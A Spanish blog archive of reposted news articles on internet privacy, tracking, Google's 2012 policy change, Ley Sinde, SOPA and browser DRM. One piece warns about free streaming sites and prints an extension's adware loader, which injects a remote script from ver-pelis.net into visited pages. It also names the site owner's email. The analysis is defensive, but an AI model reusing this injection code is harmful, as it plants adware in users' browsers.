Archivo de la categoría: El fin de las libertades-INTERNET

Collusion: una extensión para saber quien nos espía en la red

 

El seguimiento y control de lo que hacen los internautas es una fuente valiosísima de datos. Por ello la inmensa mayoría de empresas y webs crean pequeños ficheros que guardan en nuestro ordenador, llamados “cookies“.

Pero la cosa no termina ahí, ya que el seguimiento de nuestros pasos por Internet va más allá de esascookies y de las webs que nos las encasquetan. Terceras empresas, que pueden o no tener nada que ver con la web original que visitamos, rastrean nuestros movimientos, a menudo sin nuestro conocimiento.

Para poder trazar un mapa de estas empresas que se dedican a seguirnos, desde Mozilla acaban de presentar la extensión Collusion, una pequeña herramienta que dibuja los enlaces que se van creando a medida que saltamos de una web a otra. A medida que nuestros datos son espiados por una empresa y luego otra.

En la demostración del plugin, Mozilla nos dice que con una simple visita a la web imdb.com, tres empresas ya estarán vigilándonos. Luego, con una visita al New York Times, se añaden otras dos. Y si nos vamos a la web del Huffington Post, aparecen otras seis empresas más.

Collusion solamente indica qué empresas nos están siguiendo por la web, pero en ningún caso sirve como herramienta para evitarlo. Para ello, desde la misma web de la extensión recomiendan el uso de Tracker Block, otra extensión creada por el equipo de Privacy Choice, que se dedica, además de a crear extensiones para controlar a quien damos nuestros datos, a facilitar la aplicación de políticas de privacidad legibles por seres humanos que no sean abogados especializados.

El fin de Collusion es el de intentar concienciar a aquellos usuarios no expertos en materias de privacidad, para que vean con sus propios ojos cómo sus datos van cambiando y se van registrando. Una vez sabes cuando y quien te sigue, se puede decidir si dejarlo todo como está, o tomar medidas para evitarlo.

Solo con ver el mapa que se va trazando a medida que uno va pulsando enlaces, a uno ya le entran pequeños escalofríos…

http://www.nacionred.com/privacidad/collusion-una-extension-para-saber-quien-nos-espia-en-la-red

Twitter archivará tu timeline de dos años para que las empresas puedan analizar tus gustos

Si creías que cualquier ocurrencia de las que escribes en Twitter desaparecería en poco tiempo y tu reputación quedaría a salvo, te equivocabas. A no ser que borres tus comentarios o que tu perfil sea privado, durante los próximos dos años, Twitter indexará tus mensajes para que las empresas puedan monitorizar tus contenidos y analizar tus gustos y preferencias.

Hasta ahora, los datos eran consultables sólo hasta 30 días después de su publicación en la red social, pero a partir de ahora las firmas que operan con información relativa a las preferencias de los consumidores podrán recuperar mensajes de hasta enero de 2010. Eso es mucha información. Según el gerente de Datasift, que es la primera empresa que monitoriza estos contenidos, en la actualidad procesan 250 millones de tuits a la hora.

Está claro que quien escribe algo en Twitter renuncia a su privacidad, pero no ha faltado la nota crítica de quienes entienden que la red social se usa teniendo en cuenta la corta vida útil que tienen sus contenidos. Si ahora se aplica esta vigencia de los mensajes con retroactividad, quizá no hablemos de vulneración de los derechos, pero sí de una jugarreta muy poco estratégica por parte del pajarito.

Vía | BBC

http://www.nacionred.com/nuevos-modelos-de-negocio/twitter-achivara-tu-timeline-de-dos-anos-para-que-las-empresas-puedan-analizar-tus-gustos

Cambios de privacidad de Google: diez preguntas sobre cómo nos afectarán

El 1 de marzo Google unifica las 60 políticas de privacidad de sus diferentes servicios y podrá cruzar la información privada del usuario en su beneficio

– Imagen: John Marino -El próximo jueves 1 de marzo, en tres días, Google cambia las condiciones de uso y de privacidad de sesenta servicios y productos para unificarlos en una sola política. Este cambio forma parte de una estrategia de la compañía para unificar todos los datos que tiene de los usuarios registrados en diferentes servicios, como Gmail, Youtube o Picasa, y poder gestionar mejor el conocimiento de sus clientes. Sin embargo, ¿es legal esto? ¿Ataca a nuestra intimidad? ¿Puede ser un arma que nos deje a merced de gobiernos y mafias?

¿A quién afecta el cambio de Google?

Este cambio afecta a millones de usuarios en todo el mundo debido a la gran penetración en el mercado que tienen algunos de los productos del gigante norteamericano. Gmail cuenta con 350 millones de usuarios registrados activos, es decir, usuarios que acceden a sus cuentas al menos una vez cada 30 días. También hay excepciones, ya que algunos productos y servicios de Google no se verán afectados por estos cambios, como el navegador Google Chrome o la pasarela de pagos Google Wallet.

¿Qué repercusión tendrá para los usuarios?

Los usuarios que accedan a servicios de Google sin estar registrados con el buscador o Youtube no se verán afectados por este cambio

Con este cambio, Google unifica todos los datos personales que almacena y conserva de los usuarios registrados en sus diferentes servicios. Hasta ahora, a pesar de que servicios como Youtube o Gmail eran de la misma empresa, sus condiciones de uso y privacidad eran diferentes y, por tanto, los datos de los usuarios estaban almacenados en diferentes bases. En cambio, los usuarios que accedan a servicios de Google sin estar registrados con el buscador o Youtube, no se verán afectados por este cambio.

¿Podrá saber Google más información de los usuarios de la que ya conoce?

Según Google, esta nueva política de privacidad no está pensada para hacerse con nueva información de los usuarios, sino para centralizar la que ya conocía.

¿Para qué utilizará esta unificación de datos personales?

Google podrá conocer mejor a sus usuarios para ofrecerles publicidad segmentada según sus gustos

Con este cambio, Google podrá conocer mejor a sus usuarios para ofrecerles publicidad segmentada según sus gustos y mejorar servicios como las búsquedas personalizadas. Es decir, podrá cruzar todos los datos que tiene de un usuario para mejorar la experiencia en sus diferentes servicios en línea. Google explica en una entrada en su blog corporativo que, si un usuario añade una reunión en Google Calendar y a la hora señalada detecta que el usuario aún no ha llegado al lugar convenido, de manera automática, le enviará un recordatorio mediante una alerta.

¿Qué tipo de datos almacena Google?

Google utilizará nuestras fotografías, la dirección de correo, los teléfonos, los mensajes publicados en el chat, la diferentes direcciones IP desde las cuales nos conectamos, el historial de búsquedas o nuestros datos bancarios

Los datos de carácter personal son cualquier información de una persona relativa a su vida privada, profesional o pública. Estos datos pueden ir desde el nombre, apellidos, fotografías, dirección de correo, teléfonos, los mensajes publicados en Google, sus diferentes direcciones IP desde las cuales se ha conectado en los últimos nueve meses, el historial de búsquedas o sus datos bancarios, en el caso de utilizar los servicios de pago de Google. En este sentido, la protección de los datos personales se considera un derecho fundamental, según la Carta de los Derechos Fundamentales de la Unión Europea.

¿Qué deberán hacer los usuarios?

El primero de marzo, todos los usuarios registrados de algún producto de Google deberán aceptar las nuevas cláusulas del servicio para poder acceder a sus cuentas. Al acceder a ellas, Google presentará una ventana donde se mostrará la nueva política de privacidad para que se acepte. Los usuarios no podrán rechazar cláusulas concretas y deberán aceptarlas todas para poder utilizar estos servicios en linea. De esta forma, la única manera de no aceptarlas es solicitar la baja.

¿Estos cambios también afectan a los usuarios de teléfonos Android?

Google también puede acceder a datos relativos a llamadas y mensajes cortos enviados desde teléfonos con Android

Las primeras versiones de Android requerían darse de alta de forma obligatoria como usuario de Google. Sin embargo, desde versiones más recientes, los usuarios pueden activar su terminal sin necesidad de ser usuario registrado de esta empresa. Por tanto, los cambios de privacidad solo afectan a los servicios y aplicaciones de Google instaladas en el teléfono, como Gmail. En este caso, con esta nueva política de privacidad, Google podrá acceder a datos relativos al teléfono, como modelo, versión del sistema operativo, operador de telecomunicaciones y redes móviles y wifi utilizadas. También puede acceder a datos relativos a llamadas y mensajes cortos enviados.

¿Cómo mejorar la privacidad o descargar una copia de los datos almacenados por Google?

Google dispone de diversas herramientas para gestionar la privacidad de sus diferentes servicios. Entre otras opciones, es posible controlar los datos y limitar el acceso a datos personales a ciertos contactos. Los usuarios de Google cuentan con la posibilidad de descargar un archivo comprimido con la información almacenada en los servicios, como mensajes, documentos y fotografías.

¿Google puede compartir los datos personales con terceros, como empresas, instituciones y gobiernos?

En caso de requerimientos judiciales o en el curso de una investigación, Google está obligado por diferentes legislaciones locales a transferir nuestros datos

Según Google, no se han realizado cambios en sus principios elementales respecto a la privacidad. Por tanto, venderá y compartirá información personal con terceros. Los usuarios pueden tomar la decisión sobre qué datos personales de los almacenados por Google pueden transferirse a terceros para recibir ofertas y servicios personalizados. Entre otros, los usuarios pueden dar su consentimiento para que los datos almacenados por su servicio de publicidad DoubleClick, guardado en diferentes cookies en el ordenador del usuario al navegar por Internet, puedan combinarse con los datos que Google conserva del usuario. Sin embargo, en caso de requerimientos judiciales o en el curso de una investigación, Google está obligado por diferentes legislaciones locales a transferir esta información a una autoridad competente.

¿Es seguro este cambio para los usuarios?

A pesar de las explicaciones de Google, estos cambios han causado recelo en la Unión Europea. El grupo de trabajo que aglutina a las agencias de protección de datos de los países miembros solicitó a Google mayor información sobre estos cambios en la privacidad, para indagar cuál puede ser el alcance de los mismos. Se da la circunstancia de que la Unión Europea trabaja en una nueva normativa de protección de datos que unifique las diferentes legislaciones y reglamentos existentes entre los países miembros. Según un estudio encargado por la Comisión, el 72% de los europeos piensa que las empresas utilizan mal sus datos personales.

http://www.consumer.es/web/es/tecnologia/internet/2012/02/27/206984.php

Ley Sinde: ¿pueden cerrar mi página web?

– Imagen: Jacob Bøtter -El pasado 30 de diciembre, el último Consejo de Ministros del año aprobó la denominada «Ley Sinde« -también conocida como «Sinde-Wert», por los ministros que la promovieron- bajo el nombre de Texto Refundido de La Ley de Propiedad Intelectual (PDF, 2,4 megabytes). Este conforma un paquete de medidas que afectan a diferentes áreas y ministerios. Su objetivo es adaptar las leyes de propiedad intelectual al entorno digital y de Internet. Entre las medidas que recoge, desde el artículo 15 en adelante ha levantado una gran polémica, ya que crea una comisión, dependiente del Ministerio de Cultura, que puede ordenar, sin el concurso de un juez, el cierre de páginas web sospechosas de descargas de contenidos. ¿La página del usuario puede verse de algún modo afectada por esta medida?

Cuidado con las retiradas voluntarias

La nueva Ley contempla la creación de la Comisión de la Sección Segunda, dependiente del Ministerio de Cultura y formada por miembros de las industrias culturales, políticos y representantes de los usuarios. Esta comisión tendrá potestad para cerrar una página web en el caso de que se considere que la misma vulnera los derechos de propiedad intelectual de los titulares demandantes. Al propietario de la página se le darán 48 horas para retirar de manera voluntaria los contenidos considerados ilegales: pueden ser desde canciones hasta vídeos de Youtube.

Si el propietario de la página retira los contenidos de manera voluntaria, reconocerá de forma implícita su culpabilidad

Si se presentan alegaciones y no se procede a la retirada voluntaria, la Sección Segunda dictará una propuesta de resolución en la que se puede solicitar la eliminación de los contenidos, o la interrupción de sus servicios, y darán al demandado cinco días para presentar sus conclusiones al respecto. Al cabo de los mismos se lanzará un apremio de 24 horas, tras las cuales se procederá a la retirada forzosa o al cierre de la página.

En todo el proceso no intervendrá juez alguno, pero en el caso de que el propietario de la página acceda de manera voluntaria a retirar los contenidos, reconocerá de manera implícita su culpabilidad y, por tanto, según los principales expertos jurídicos en el tema, incurrirá en delito y podrá ser denunciado ante una corte penal y sancionado económicamente. Por ello, los abogados recomiendan recurrir todos los requerimientos y dejar que sea la Sección Segunda la que efectúe la retirada forzosa.

Medida polémica

Cuando la ley no era más que un anteproyecto, este modo de proceder levantó una gran polémica entre la comunidad internauta al entender que en una democracia el poder legislativo (los políticos) no podía arrogarse funciones del poder judicial (los jueces) y que una disposición de este tipo violaba varios derechos fundamentales de los usuarios. Después de la revuelta generada en la Red, el Gobierno de entonces, era 2010, decidió tener en cuenta la figura de un juez de la Audiencia Nacional como garante de que, con el cierre de un sitio web, no se violan derechos fundamentales.

El magistrado no podrá determinar si la página vulnera los derechos de propiedad intelectual o no, por lo que el cierre lo dictará la Sección Segunda

Este juez sería el encargado de estudiar si con la acción del cierre se daña la libertad de expresión en la página que es objeto de la denuncia. Se pretende garantizar que la Comisión de la Sección Segunda será una herramienta para velar por los derechos de los autores y no un arma de represión política y social.

Ahora bien, este magistrado no podrá resolver si el cierre responde a infracciones de la legalidad en la vulneración de derechos, es decir, no podrá determinar si la página vulnera los derechos de propiedad intelectual o no y, por tanto, está justificado su cierre, ya que solo está autorizado a pronunciarse tras la orden emitida por la Comisión. Por otro lado, para agilizar esta medida, el juez solo tendrá cuatro días para emitir un veredicto sobre la violación de derechos en el cierre.

¿Cómo afectará a los usuarios?

Según diferentes análisis jurídicos de expertos en derecho, propiedad intelectual e Internet, la medida deja la puerta abierta para que pueda cerrarse cualquier página web que haya cometido una vulneración de la propiedad intelectual por pequeña e involuntaria que sea. De este modo, colgar una fotografía ajena en un blog o un vídeo de Youtube en una página personal podría ser motivo de cierre.

En principio, podría cerrarse todo blog que recoja enlaces, citas, fotografías u otros contenidos culturales con Copyright sin permiso de sus autores

Llegar a este extremo no quiere decir que cualquier página de los usuarios esté en peligro, puesto que el objetivo de la norma no es perseguir a los consumidores de contenidos culturales, sino a los sitios que proveen de ellos sin permiso de explotación ni pago de derechos y que concurren en la infracción con claro ánimo de lucro.

Ahora bien, en principio, podría cerrarse todo blog que contenga enlaces, citas o incluya fotografías u otros contenidos culturales con Copyright sin permiso de sus autores. Además, si el sitio carece de publicidad, también le afecta la norma, ya que el anteproyecto hace hincapié en que la medida se dirige a cualquier página web, con o sin ánimo de lucro, que cause un daño patrimonial tanto directo como indirecto. Donde no entra la ley es en las descargas realizadas por los usuarios en plataformas como Emule o BitTorrent, o cualquier otro sistema. En España, esta actividad no es delito ni tampoco se pueden aplicar cortes en la conexión a la Red.

En otras palabras, la norma tampoco garantiza que jamás pueda llegarse a tal extremo y lo cierto es que todo blog y sitio web, por muy personal que sea, dispone de enlaces a contenidos que pertenecen a terceros, puesto que esta es la esencia de Internet y del denominado hipertexto.

Los usuarios que se descarguen contenidos de las redes P2P no cometen delito ni corren peligro de que se les corte la conexión

En conclusión, la norma no aclara si se podría utilizar el hecho de enlazar a contenidos de terceros como motivo, o excusa encubierta, de cierre. Tal como declara el activista y periodista Fernando Berlín, «la Ley de Economía Sostenible es ambigua y podría utilizarse contra la libertad de expresión». El abogado David Bravo va más allá y la tilda de inconstitucional.

Por otra parte, diferentes empresas que tienen en la Red su base de negocio han manifestado su preocupación por la inseguridad jurídica que esta medida puede generar en el sector de la innovación y las nuevas tecnologías. Consideran que una normativa que deja la puerta abierta al cierre de páginas sin pasar por un juez, y mediante una comisión que implica a miembros de diversos sectores económicos, podría lesionar con facilidad la libre competencia en favor de los intereses de los comisionados.

http://www.consumer.es/web/es/tecnologia/internet/2010/02/22/190976.php

Anonymous se mete en campaña contra los defensores de la SOPA y la NDAA

«Nuestras Urnas – Ocupa el Voto 2012». Este es el lema de la ‘campaña electoral’ lanzada por el grupo de piratas informáticos Anonymous en un esfuerzo conjunto con el movimiento anti-Wall Street. La iniciativa carga contra los funcionarios por sus acciones contra los derechos civiles.

En un comunicado publicado en Internet, los activistas explicaron que «muchos de los funcionarios electos nos defraudaron cediendo ante poderosos ‘lobbies’y aprobando leyes destinadas a aumentar los beneficios empresariales a costa de la libertad individual».

«Usted es una persona. Usted tiene derecho a un voto. Ejérzalo el 6 de noviembre [día de las presidenciales en EE. UU.] para hacer a su funcionario electo responsable por apoyar proyectos de leyes como la NDAA (ley de Autorización de Defensa Nacional), la SOPA y la PIPA», reza el comunicado.

Aunque las polémicas leyes antipiratería SOPA y PIPA han sido congeladas por el Congreso después de que suscitaran una protesta cibernética mundial, la NDAA fue firmada el pasado 31 de diciembre por Obama. Se trata, según ellos, de «una de las mayores amenazas a las libertades civiles en la historia de  EE. UU.», ya que faculta a los militares para detener a ciudadanos sin presentar cargos contra ellos durante un plazo indefinido.

De acuerdo con el comunicado, ambos grupos de ‘indignados’ tienen como objeto asegurar que cualquier legislador estadounidense salga perdiendo el día de las elecciones si apoya parecidos proyectos de leyes.

«Estamos convocando a los votantes, activistas y luchadores bajo todo tipo de lemas para unirnos como una sola fuerza para derrocar a los representantes electos que amenazan nuestras libertades esenciales y que con gran rapidez redujeron al mínimo nuestros derechos constitucionales individuales para sacar un fácil beneficio corporativo», condena el comunicado.

Durante el ataque de la semana pasada contra el operador de prisiones privadas con ánimo de lucro GEO Group, Anonymous anunció otro plan diseñado en coolaboración con el movimiento Ocupa Wall Street: unir sus fuerzas este martes para marchar por las ciudades de todo el país y exigir el fin de la represión del movimiento.

Artículo completo en: http://actualidad.rt.com/actualidad/ee_uu/issue_36779.html

Sony afirma que la censura alemana de vídeos en YouTube les cuesta millones

Quien los entienda que les compre. Sony Music afirma a través de su CEO para el mercado internacional que internet es una bendición para la industria cultural, y que por culpa de la GEMA, la SGAE alemana, se están perdiendo millones de dólares de negocio. ¿La razón? Nada, que en Alemania la mayoría de los vídeos de YouTube donde aparecen artistas de Sony se bloquean por la presión que ejerce la GEMA, y no porque Sony lo pida.

Que el sector de la industria cultural se está adaptando como buenamente puede a los cambios que supone internet es algo que queda fuera de toda duda, y poco a poco se está viendo dónde está realmente el problema. Emperrarse en llamar delincuentes a quienes te pagan el sueldo no parece ser la mejor estrategia comercial, al menos no para Sony:

No se puede culpar a internet por los excesos que causan daño. Al revés, la red nos ha aportado enormes oportunidades.

Y el discurso sigue en la línea de promover servicios de streaming como Spotify y Vevo y dejarse de zarandajas, que el negocio se les muere y no es cuestión de perder el tiempo jugando al gato y el ratón con la clientela. Vayamos a por palomitas, porque esto de ver a uno de los mayores sellos discográficos echándole la bronca a una de las más restrictivas sociedades de derechos de autor tiene su punto.

Vía | Torrent Freak

Los usuarios de redes sociales se preocupan cada vez más por su privacidad

CNNMéxico) — Los usuarios de las redes sociales están cada vez más preocupados por la privacidad de sus cuentas, y cada vez más borran a personas de sus listas de contactos, según un estudio del centro Pew divulgado este viernes.

De los dos tercios de los usuarios estadounidenses que utilizan las redes sociales, el 63% ha borrado de sus listas a contactos, 7% más que en 2009; el 44% han borrado comentarios hechos por otros en sus perfiles, y el 37% han removido sus nombres de fotografías donde fueron etiquetados, según el estudio.

La mayoría de quienes borran a personas de sus listas son mujeres —el 67% contra el 58% de hombres—, y gente joven.

La mayoría de los internautas —el 58%— se protegen en internet poniendo como privado sus perfiles, mientras que el 19% lo ponen como parcialmente privado, y el 20% lo mantienen completamente público. Quienes más se protegen son las mujeres: 67% contra el 48% de hombres.

El estudio también afirma que el 11% de los internautas ha lamentado subir información a internet. De ellos, son los hombres quienes más se arrepienten —15% frente al 8% de mujeres—, y en su mayoría son jóvenes adultos. El 15% de los jóvenes de entre 18 y 29 años dijeron que subieron contenido del cual luego se arrepintieron de difundir.

De todos los usuarios de las redes sociales, el 93% tiene una cuenta de Facebook. La popularidad de MySpace sigue en caída, según el estudio, que señala que solo el 23% de los usuarios tienen una cuenta en dicha plataforma, comparado con el 48% registrado en 2009.

En tanto, la popularidad de Twitter está en crecimiento: 11% de los usuarios afirman tener cuenta en dicha red, a comparación con el 6% que lo afirmaba en 2009.

El estudio del centro Pew está basado en entrevistas telefónicas realizadas entre abril y mayo de 2011 a 2,227 adultos mayores de 18 años, en español e inglés.

http://mexico.cnn.com/tecnologia/2012/02/24/los-usuarios-de-redes-sociales-se-preocupan-cada-vez-mas-por-su-privacidad?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+cnnmexico%2Fportada+%28Noticias%29&utm_content=Google+Reader

‘Cibercensura’ sin precedentes: ONU podría elaborar un acuerdo para apoderarse de Internet

Una colaboración de piloto pirx

'Cibercensura' sin precedentes: ONU podría elaborar un acuerdo para apoderarse de Internet
Imagen: RT

La privacidad y la seguridad en Internet podrían encontrarse muy pronto bajo control internacional. El próximo 27 de febrero en la ciudad suiza de Ginebra se iniciará una negociación diplomática que podría llevar a un nuevo tratado que daría a la ONU poderes sin precedentes en Internet.

En caso de ser aceptada, la propuesta acabaría con la Regulación de las Telecomunicaciones Internacionales, que está en vigor desde 1988, cuando 114 Estados firmaron el acuerdo en Australia con el fin de facilitar la interconexión y la interoperabilidad global de la infraestructura de telecomunicaciones, y promover la eficacia y la disponibilidad de los servicios de telecomunicaciones internacionales.

Según reitera el diario norteamericano ‘The Wall Street Journal’, la medida se debe a que actualmente muchos regímenes se sienten amenazados por los opositores que pueden contar con una red en su búsqueda de una vida política libre y abierta, por lo que decenas de países están presionando a la organización para renegociar el tratado para antes de finales de 2012.

Medidas ‘escalofriantes’

El periódico enumera solo algunas de las propuestas que califica de “escalofriantes” y que podrían ser aprobadas en la conferencia planeada en Dubái, Emiratos Árabes, en diciembre de este año.

Así, el acuerdo permitiría a las empresas extranjeras de telefonía cobrar por el tráfico ‘internacional’ de Internet, tal vez incluso por cada clic en ciertas web, con el objetivo de generar ingresos para las compañías de telefonía estatales y arcas públicas.

Además, el tratado impondría unas regulaciones económicas sin precedentes, como las instrucciones relativas a las tarifas, términos y condiciones para el tráfico, actualmente sin regular.

Entre otras medidas también se prevé establecer por primera vez entidades de gestión de la Red, tales como la Corporación para la Asignación de Nombres y Números de Internet, un organismo sin ánimo de lucro que coordinaría todas las direcciones de Internet del mundo.

Hace poco más de un mes, los representantes de 22 países de la Unión Europea firmaron en la ciudad de Tokio el Acuerdo Comercial contra las Falsificaciones (ACTA, por sus siglas en inglés), que propone fijar la protección de la propiedad intelectual a nivel internacional y supone multas e incluso encarcelamiento por infracciones. El hecho conmovió a la comunidad internacional hasta tal punto que varios Gobiernos incluso tuvieron que anunciar la paralización del proceso de ratificación.

Fuente: RT

Nueva ley de Ciberseguridad, ahora sin botón para apagar Internet

Tras unas semanas de tranquilidad, una vez la SOPA y la PIPA se pusieron en el congelador, un grupo de senadores presentó hace unos días una nueva propuesta de ley de ciberseguridad.

El grupo que ha presentado el nuevo proyecto lo conforman John Rockefeller IV, Susan Collins, Dianne Feinstein y el ‘amigo’ Joe Lieberman, todos conocidos por sus intentos de impulsar leyes de control de Internet a expensas de las libertades civiles.

Collins y Lieberman ya estuvieron detrás de los intentos hace un par de años de lanzar la ley que otorgaba al Presidente de los Estados Unidos de América la capacidad de apagar Internet, el conocido “Internet kill switch”.

Por su parte, Feinstein fue de las primeras en pedir la cabeza de Julian Assange, y a Lieberman le conocemos por ser el que llamó a los de Amazon para que dejaran caer de su nube a Wikileaks. Y el senador Rockefeller se presenta él solo: es el que dijo que todo sería mucho más mejor si nunca se hubiera inventado Internet.

Con la nueva propuesta, el Departamento de Seguridad Nacional deberá establecer los riesgos y vulnerabilidades de cualquier sistema informático al cargo de alguna infraestructura crítica.

Una vez se determinen esas vulnerabilidades, los responsables de los sistemas deberán colaborar con el DHS para asegurar el sistema y prevenir cualquier posible ataque.

Y por “infraestructura crítica” se entienden las centrales eléctricas, estaciones de bombeo y depuración de agua además de un largo etcétera, ya que para los ciber-paranoicos, todo es crítico y mortal de necesidad.

La definición de “infraestructura crítica” comprende

aquellos sistemas cuya disrupción causada por un ciber-ataque pudiera llegar a causar muertes en masa, evacuación o daños mayores a la economía, la seguridad nacional o la vida diaria.

Lo bueno del caso es que las empresas cuyos sistemas sean designados como “críticos” podrán apelar la decisión que les marque como “infraestructura crítica”.

La nueva ley se encuadra claramente en las nuevas estrategiastanto de la Casa Blanca, “Estrategia de identidades confiables”, como del Pentágono, “Estrategia para la ciber-seguridad” (y segunda parte).

Los promotores de la nueva legislación quieren dejar claro que ésta no tiene relación alguna con la SOPA ni la PIPA (ni ningún plato de comida o fruto seco), y bien que hacen.

La Ley de Ciberseguridad no hará que Internet desaparezca, si no que pretende crear una especie de Skynet para tener bien controlados todos los sistemas “críticos” que mantienen al país en marcha.

La diferencia es que, con la intención expresa de aprobar la ley, y rápido, sus responsables han suprimido el polémico “botón de internet”, una especie de “botón de pánico” que el Presidente de los Estados Unidos podía pulsar, “apagando” así la red.

Ese “botón de pánico“ fue el detonante de otra oleada de protestas, pero como podemos comprobar ahora, no se logró retirar del todo las nuevas ideas de legislación restrictiva.

Aún así, si que se prevé unificar los programas de ciberseguridad bajo un Centro Nacional para la Ciberseguridad y las Comunicaciones, aunque no está claro si quedará bajo el mando del US Cybercom o será una estructura a parte.

Así pues, volvemos con los ciclos en los frentes abiertos con el objetivo de controlar todo lo relativo a Internet. Tras el copyright, ahora toca cambio de menú: de comer ahora toca paranoia y ciberapocalipsis… los halcones vuelven a volar bien alto.

Via | ZDNet

Foto | Security and Defence Agenda

http://www.nacionred.com/seguridad-en-internet/nueva-ley-de-ciberseguridad-ahora-sin-boton-para-apagar-internet

Películas o series gratis: ¡Cuidado!

Hay algo que todos debemos entender y hasta mi abuela lo dice “nada es gratis en esta vida”, lo de <Ver Online> esta de moda y con eso el ingenio de muchos para sacar unos cuantos dolares a costa de todo.

Cada vez son mas los sitios que te piden instalar los famosos plugins o extensiones oficiales para poder disfrutar de tu película o serie favorita online. Si decides no hacerlo pues simplemente no podrás ver nada. extrañamente en esos sitios NO hay publicidad y la pregunta del millón es ¿cual es su ganancia? (porque la deben tener). Tratando de responder esta pregunta me encontré con cosas muy interesantes.

La mayoría de esos plugins incluye Adware (Malware cuyo objetivo es mostrar publicidad o remplazar la existente en sitios que visitas) ¡Aja, entonces esto lo explica todo! pero claro, solo decirlo no vale nada, veamos un ejemplo de investigación:

  • Sitio: http://www.Ver-Pelis.net
  • Alexa: Es el sitio #5,311 a nivel mundial según alexa y el #355 en México(no se trata de un sitio cualquiera, es un TOP)
  • Propietario: El sitio parece estar registrado a un tal “Jorge” de Colombia y su hosting es Dattatec, su email:xpiral@gmail.com
  • CMS: WordPress
  • Plugins: El plugin es obligatorio para reproducir las peliculas o series y esta disponible tanto para Firefox, Chrome o Internet Explorer.
Ya vimos que “Ver-Pelis.net” NO es un sitio mas para ver películas o series online, se trata de uno de los sitios mas visitados a nivel mundial. Y es lamentable que use técnicas como el malware para obtener aun mas ingresos, digo esto pues como si fuera poco, usan publicidad también en su sitio web. Bueno pero hasta el momento no he “probado” nada, así que examinemos el codigo del plugin y veamos la implementación del adware:
Primero descargamos un plugin, yo me bajare el de Google Chrome, lo voy a descargar pero NO instalar. Usare Firefox para eso. Una vez descargado veremos que se llama “vpstream30.crx” es un .crx (como todo plugin o extension de Chrome) ¿como lo abrimos? fácil: usemos Winrar. Ya abierto con Winrar veremos 2 archivos uno llamado “gox.js” y otro “manifest.json” el que nos interesa es “gox.js” al abrilo con el bloc de notas veremos lo siguiente:

function loadScript() {
if (‘https:’ == document.location.protocol) {
return false;
}
var s = document.createElement(‘script’);
s.setAttribute(“type”,”text/javascript”);
s.setAttribute(“src”, “http://static.ver-pelis.net/player/ready.js”);
var head = (document.getElementsByTagName(‘head’)[0] || document.getElementsByTagName(‘body’)[0]);
if (head!=null) {
head.appendChild(s);
}
}
loadScript();

Podemos leer que lo único que hace el plugin es llamar un script que se encuentra en el mismo sitio de “Ver-Pelis” el archivo se llama “ready.js”  y podemos acceder a el desde este enlace: http://static.ver-pelis.net/player/ready.js

Ahora abramos ese archivo llamado “ready.js” y miren lo que nos encontramos:

No hay que ser genios para leer lo que el archivo (que ellos mismos alojan) dice. A continuación un ejemplo de como ve Google alguien que ha sido “infectado” o tiene instalado el plugin de este sitio y es importante mencionar, que NO importa el sistema operativo que usen (puede ser Windows, Linux o Mac) ya que lo que se ve afectado es su navegador, cualquier puede ser victima:

¿Desde cuando Google muestra publicidad en su pagina principal? y peor aun ¿desde cuando muestra publicidad de ese tipo?

Están advertidos, Internet es genial, hasta que nos encontramos con cosas como estas. Lo mejor que podemos hacer es advertirles y que ustedes adviertan a sus conocidos y amigos. Cosas como esta no pasan solamente con este sitio de ejemplo, ocurren en muchos otros similares.  Les recomiendo vayan al administrador de extensiones de su navegador y vean lo que tienen instalado.

http://www.nikochan.net/link/49887/peliculas-series-gratis-cuidado

Google y Microsoft quieren un sistema anticopia en cada navegador de Internet

Google, Microsoft y Netflix van a proponer a la W3C (World Wide Web Consortium), dirigida por Tim Berners-Lee, el creador de la Web, a implementar un sistema anticopia en cada navegador de Internet, que filtre directamente los contenidos con derechos de autor. Es decir, censura de fábrica, sin intermediarios.

Ellos afirman que este sistema no sería un DRM tal y como lo conocemos, ya que el sistema no pretende ocultar claves u otros secretos al usuario final, de manera que no sepa realmente lo que hace el programa. Sin embargo, los mismos que han sugerido este método para reducir la piratería, admiten que este sistema podría ser añadido directamente al hardware, con lo que en ese punto si que estaría oculto al usuario y sin posibilidad de saltárselo. Ya no se donde quedó aquel “Don’t be evil”.

Sin embargo, no todos lo ven con buenos ojos, como Ian Hickson de Google, que ya ha pedido que se retire la proposición. Hickson afirma que esta medida no sería ética.

Hay muchas maneras de censurar la libertad del usuario. Se pueden cerrar páginas, filtrar los resultados, amenazar con bloquear o cortar una conexión, denunciar al usuario, poner una multa o incluso meter en la cárcel a todo el mundo. Sin embargo, una medida de estas características de base, sería como comprar un navegador GPS y borrar de los mapas todas las carreteras menos las autopistas, no vaya a ser que algún alma descarriada se le ocurra meterse por una comarcal y descubra un pueblo que le guste y se quede por ahí a hacer turismo.

Pero claro, Google y Microsoft, aunque tienen sus propios navegadores, no han contado con los demás, ni tampoco se han parado a pensar probablemente, en cómo están construidos varios de los navegadores de hoy en día.

Robert O’Callahan de Mozilla, advierte que la presión de estas compañías para instalar un DRM en los navegadores, podría llevar a una situación donde los proveedores de contenidos dirijan el tráfico hacia donde ellos quieran sin tener en cuanta a las demás partes implicadas. Sin embargo hay un problema con esta idea. Chris Pearce, programador involucrado en el desarrollo de Firefox, ha pedido información extra a la W3C para saber si esa nueva protección anticopia, podría llegar a ser implementada en un software de código abierto.

¿Puedes explicarme cómo puedes integrar una protección anticopia de este estilo en un navegador de código abierto? ¿Cómo lo protegerías contra un navegador como este, cuando simplemente con un pequeño parche que suprima esa protección, volvería a dejar al navegador preparado para distribuir contenido con derechos de autor?

Básicamente, un DRM de este tipo en navegadores basados en software libre como Firefox, no podría funcionar. Su código es de dominio público y cualquiera puede modificarlo legalmente, copiarlo y volverlo a distribuir. Si Firefox se viera obligado a adoptar esto, los hackers de la Red no tardarían ni un día en publicar una versión liberada de ese software. De hecho, ni siquiera haría falta cambiar nada en Firefox, porque seguiría habiendo cientos de versiones y navegadores libres que jamás lo incluirían.

Mark Watson de Netflix, entiende el problema y cree que es cierto que en este tipo de navegadores no se podría poner el sistema anticopia. Sin embargo, Watson afirma que el sistema podría ser integrado en el hardware de los dispositivos, de manera que no afectaría a los navegadores, sean libres o no.

Vía | BoingBoing
Foto | ÇP

http://www.nacionred.com/neutralidad-de-la-red/google-y-microsoft-quieren-un-sistema-anticopia-en-cada-navegador-de-internet

10 páginas web para leer libros y ‘e-books’ gratis

